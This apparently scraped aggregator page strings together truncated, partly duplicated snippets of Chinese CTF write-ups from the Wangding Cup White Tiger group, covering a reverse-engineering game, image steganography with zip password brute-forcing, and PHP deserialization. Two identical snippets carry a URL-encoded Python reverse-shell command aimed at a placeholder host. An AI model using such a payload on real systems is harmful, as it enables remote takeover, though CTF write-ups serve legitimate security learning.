[re]简单逆向:2020网鼎杯白虎组re 恶龙 wp 题目分析 题目描述:这是一个与史莱姆和恶龙战斗的故事,请战胜三头恶龙,取得flag。张三长老说,试图patch这个程序的人会得到错误的flag… 得到题目之后,发现是一个linux的逆向。查看一下程序功能: 结合之前的描述,感觉是一个游戏题目,连续战胜三次boss,便是成功,正常套路,...
完成游戏,通过第7关,让提交队伍token值 提交后获得flag 通过qq截图,文字识别 FLAG值: flag{f6e5***3112} 0x01hidden 操作内容: 图片隐写Binwalk图片,发现有个zip包,里面有个1.png Foremost分离出来 Zip包有密码,找了半天没找到。 只能尝试弱密码爆破 密码1235,解压开发现只有半截二维码 修改图片高度为133 恢复出...
网鼎杯2020白虎组部分WriteUp hidden 检测图片发现图片中包含隐藏的zip文件,然后将zip文件分离,如图: 解压发现需要输入密码,然后使用john进行枚举密码,然后解压得到另一个图片,如图: 查看图片发现是二维码的一半,如图: 查看图片详细信息发现图片大小是133*67,对应十六进制85*43,将图片重命名为1.txt,使用sublime_text修改...
2022网鼎杯白虎组web题(php反序列化)_WriteUp jimmy520 2022-12-07 15:52:16 478966 所属地 辽宁省题目源代码 <?php class abaaba{ protected $DoNotGet; public function __get($name){ $this->DoNotGet->$name = "two"; return $this->DoNotGet->$name; } public function __toString(){ ...
但是不会回显,要反弹shell了。 python脚本反弹shell /no_one_know_the_manager?key=2e3658a3c99be231c2b3b0cc260528c4&shell=python%20-c%20%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22xx.xx.xx.xx%22,8080));os.dup2(s.fileno(),0)...
2022网鼎杯白虎组web题(php反序列化)_WriteUp jimmy520 2022-12-07 15:52:16 479004 所属地 辽宁省题目源代码 <?php class abaaba{ protected $DoNotGet; public function __get($name){ $this->DoNotGet->$name = "two"; return $this->DoNotGet->$name; } public function __toString(){ ...
原博文 【网鼎杯2020白虎组】Web WriteUp [picdown] 2020-05-18 22:39 −... yokan 1 2732 <1>
2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhite2417/12421267 0x00 签到 操作内容: 完成游戏,通过第7关,让提交队伍token值 提交后获得flag 通过qq截图,文字识别 ... 查看原文 i春秋网鼎杯网络安全大赛minified题目write...
但是不会回显,要反弹shell了。 python脚本反弹shell /no_one_know_the_manager?key=2e3658a3c99be231c2b3b0cc260528c4&shell=python%20-c%20%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22xx.xx.xx.xx%22,8080));os.dup2(s.fileno(),0)...